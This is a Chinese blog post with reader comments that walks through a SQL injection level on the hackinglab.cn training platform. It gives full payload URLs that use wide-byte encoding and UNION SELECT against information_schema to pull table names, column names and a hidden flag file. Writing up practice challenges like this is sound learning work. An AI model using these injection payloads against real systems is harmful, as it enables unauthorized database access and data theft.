正在阅读:

网络信息安全攻防学习平台注入关邂逅过关攻略

10,447

此关老早就有了,一直也不知道此题的考点是在哪里,放着好久没有做了,最近有朋友交流攻防平台的过关方法,终于解决了。。。

过关地址:

http://hackinglab.cn/index_4.php

邂逅介绍:

小明今天出门看见了一个漂亮的帅哥和漂亮的美女,于是他写到了他的日记本里。

http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/

过关思路:

1、最初把焦点放在了url中id参数上(页面源文件注释部分),结果发现没有注入。

2、经过朋友提示图片注入,把注入参数放在图片地址上面,而且需要使用宽字节的方式注入,如下图:

sqljpg

sqljpg2

3、从上图可以看出,确实从图片那里注入,不过图片注入还真没有听过,我觉得应该是伪静态注入,不知道大家怎么认为?

http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/cat1.jpg%bf%27%20union%20select%201,2,TABLE_NAME,4%20from%20information_schema.TABLES%20where%20table_SCHEMA=0x723034363663706c7573687561%20limit%201,1%23

得到表名:pic

http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/cat1.jpg%bf%27%20union%20select%201,2,COLUMN_NAME,4%20from%20information_schema.COLUMNS%20where%20table_NAME=0x706963%20limit%201,1%23

得到字段名:picname

http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/cat1.jpg%bf%27%20union%20select%201,2,picname,4%20from%20pic%20limit%202,1 %23

得到图片名称:flagishere_askldjfklasjdfl.jpg

4、最开始使用askldjfklasjdfl作为答案发现不行,后来经过提示,直接访问上面图片,就能得到答案了。

访问如下URL即可看到flg:

http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/flagishere_askldjfklasjdfl.jpg

sqljpgflag

感谢QQ好友:85918842(ddl)提供过关思路。。

目前有:9条访客评论,博主回复3

  1. ...
    2015-07-07 15:57

    学习了!

  2. try_try
    2015-07-07 22:30

    谢谢分享,没想到注入点在这里……

    • 独自等待
      2015-07-08 13:24

      我也没有想到呀,还是问了朋友才知道的,纠结了我好久。

  3. netpopok
    2015-07-08 15:07

    这个太难想到了,考虑到id无法注入,我试过在image这边用user-agent,referer等http头部注入,但没成功,就放弃了

  4. netpopok
    2015-07-08 15:17

    这个需要用burp之类的工具吗,怎么我用火狐的hackbar提交,提示我图像本身有错而无法显示啊

    • 独自等待
      2015-07-13 22:00

      用burpsuite测试,可以直接查看,要不然就需要把图片下载回来。

  5. sammy
    2015-07-24 16:27

    博主真的很厉害啊,我做了很长时间都不会。学习了。

  6. 黁
    2015-07-30 22:33

    博主,现在的注入关第四题防注入怎么注入都注入不成功,给个tips吧

    • 独自等待
      2015-08-02 19:31

      我当时是使用宽字节注入过的,现在不知道啥情况了。我记得当时我还做记录了,现在记录也找不到了。

  7. 试试
    2015-07-30 22:39

    博客注入关第四题防注入怎么也突破不了,给个tips 吧

  8. miner
    2015-08-22 19:05

    第4关的防注入是宽字符注入加上猜解id数

  9. sunny
    2015-08-22 21:25

    第四关猜解id数

留下脚印,证明你来过。

*

*

流汗坏笑撇嘴大兵流泪发呆抠鼻吓到偷笑得意呲牙亲亲疑问调皮可爱白眼难过愤怒惊讶鼓掌